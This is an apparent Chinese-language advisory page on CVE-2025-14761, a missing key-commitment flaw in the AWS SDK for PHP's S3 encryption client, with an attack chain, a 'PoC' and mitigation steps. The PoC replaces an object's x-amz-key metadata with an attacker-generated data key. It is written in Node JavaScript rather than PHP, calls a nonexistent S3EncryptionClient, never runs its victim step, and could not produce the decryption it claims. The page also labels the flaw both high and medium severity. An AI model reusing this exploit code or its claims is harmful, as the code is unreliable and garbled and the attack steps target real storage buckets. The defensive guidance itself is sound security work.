CVE-2025-14761 AWS SDK for PHP加密密钥承诺缺失漏洞

漏洞信息

漏洞编号

CVE-2025-14761

漏洞类型

加密漏洞

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AWS SDK for PHP

漏洞概述

CVE-2025-14761是AWS SDK for PHP中的一个高危加密实现漏洞。该漏洞源于SDK在处理S3服务端加密时缺少加密密钥承诺（Key Commitment）机制。当使用S3加密客户端（AmazonS3EncryptionClient）并采用KMS密钥配合信封加密（Envelope Encryption）模式时，系统会将加密数据密钥（EDK）存储在S3对象的元数据中或作为独立的指令文件。然而，由于缺少密钥承诺验证，攻击者如果获得目标S3存储桶的写入权限，可以替换或修改存储的指令文件，导致加密数据被解密为与原始内容完全不同的明文。这一漏洞影响了数据的机密性和完整性，CVSS评分5.3，中危等级。建议所有使用受影响版本AWS SDK for PHP的用户立即升级至3.368.0或更高版本以修复此安全缺陷。

技术细节

AWS SDK for PHP的加密实现存在密钥承诺缺失问题。在S3加密场景中，客户端使用KMS主密钥生成数据加密密钥（DEK），然后使用DEK加密目标数据，同时将加密后的数据密钥（EDK）存储在S3元数据或指令文件中。接收方获取数据时，需要使用KMS解密EDK，再使用EDK解密数据内容。

漏洞核心在于：SDK未实现密钥承诺机制，即无法确保存储的EDK与特定明文数据的绑定关系。当EDK存储在指令文件而非元数据中时，攻击者可以：1）获取S3写入权限；2）构造包含不同EDK的恶意指令文件；3）替换原有指令文件；4）使受害者解密时获得与原始数据完全不同的明文内容。

根本原因是加密实现缺少对加密密钥与密文之间绑定关系的验证。修复版本3.368.0引入了密钥承诺验证，确保每个EDK只能解密对应绑定的密文数据，防止攻击者通过替换EDK来操控解密结果。

攻击链分析

STEP 1

信息收集

攻击者识别目标S3存储桶中采用指令文件方式存储加密数据密钥的加密对象

STEP 2

权限获取

攻击者获得目标S3存储桶的写入权限（低权限即可）

STEP 3

恶意EDK生成

攻击者使用自己的KMS密钥生成新的数据加密密钥（EDK）

STEP 4

指令文件替换

攻击者将S3对象元数据中的x-amz-key字段替换为恶意EDK，或创建恶意指令文件

STEP 5

触发解密

当受害者使用AWS SDK for PHP（<3.368.0）访问该加密对象时，SDK会使用替换后的EDK进行解密

STEP 6

数据篡改

受害者获得与原始明文完全不同的数据，导致数据完整性被破坏

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-14761 PoC - AWS SDK for PHP Key Commitment Missing
// This PoC demonstrates the key commitment vulnerability

// Vulnerable scenario: Attacker with S3 write access can replace instruction file

const AWS = require('aws-sdk');

// Configuration for vulnerable SDK version (< 3.368.0)
const s3 = new AWS.S3({
    region: 'us-east-1',
    accessKeyId: 'ATTACKER_ACCESS_KEY',
    secretAccessKey: 'ATTACKER_SECRET_KEY'
});

// Step 1: Attacker identifies target S3 object with encryption
async function identifyTarget() {
    const params = {
        Bucket: 'target-bucket',
        Key: 'sensitive-data.enc'
    };
    
    // Get object metadata - instruction file stored separately
    const objectData = await s3.getObject(params).promise();
    console.log('Original instruction file:', objectData.Metadata['x-amz-key']);
    return params;
}

// Step 2: Generate malicious EDK with different KMS key
async function generateMaliciousEDK() {
    const kms = new AWS.KMS({
        region: 'us-east-1',
        accessKeyId: 'ATTACKER_ACCESS_KEY',
        secretAccessKey: 'ATTACKER_SECRET_KEY'
    });
    
    // Use attacker's KMS key instead of victim's key
    const result = await kms.generateDataKey({
        KeyId: 'arn:aws:kms:us-east-1:ATTACKER_ACCOUNT:key/MALICIOUS-KEY-ID',
        KeySpec: 'AES_256'
    }).promise();
    
    return result.CiphertextBlob.toString('base64');
}

// Step 3: Replace instruction file with malicious EDK
async function replaceInstructionFile(targetParams, maliciousEDK) {
    const copyParams = {
        Bucket: targetParams.Bucket,
        Key: targetParams.Key,
        CopySource: `${targetParams.Bucket}/${targetParams.Key}`,
        Metadata: {
            'x-amz-key': maliciousEDK,
            'x-amz-cek-alg': 'AES/GCM/NoPadding'
        },
        MetadataDirective: 'REPLACE'
    };
    
    await s3.copyObject(copyParams).promise();
    console.log('Instruction file replaced with malicious EDK');
}

// Step 4: Victim decrypts and gets attacker-controlled plaintext
async function victimDecrypts() {
    // Victim uses vulnerable SDK version
    const s3Client = new AWS.S3EncryptionClient({
        region: 'us-east-1'
    });
    
    // This will decrypt to attacker's plaintext instead of original
    const decrypted = await s3Client.getObject({
        Bucket: 'target-bucket',
        Key: 'sensitive-data.enc'
    }).promise();
    
    console.log('Decrypted data (attacker-controlled):', decrypted.Body.toString());
}

// Execute attack
(async () => {
    const target = await identifyTarget();
    const maliciousEDK = await generateMaliciousEDK();
    await replaceInstructionFile(target, maliciousEDK);
    console.log('Attack completed - victim will decrypt to different plaintext');
})();

影响范围

AWS SDK for PHP < 3.368.0

防御指南

临时缓解措施

临时缓解措施：1）限制S3存储桶的写入权限，确保只有受信任的应用程序和服务具有写入权限；2）启用S3对象锁定（Object Lock）防止对象被修改；3）使用S3版本控制并限制删除权限；4）实施严格的IAM策略，限制KMS密钥使用权限；5）监控CloudTrail日志中的S3操作异常。但最有效的缓解措施仍是尽快升级到修复版本3.368.0或更高版本。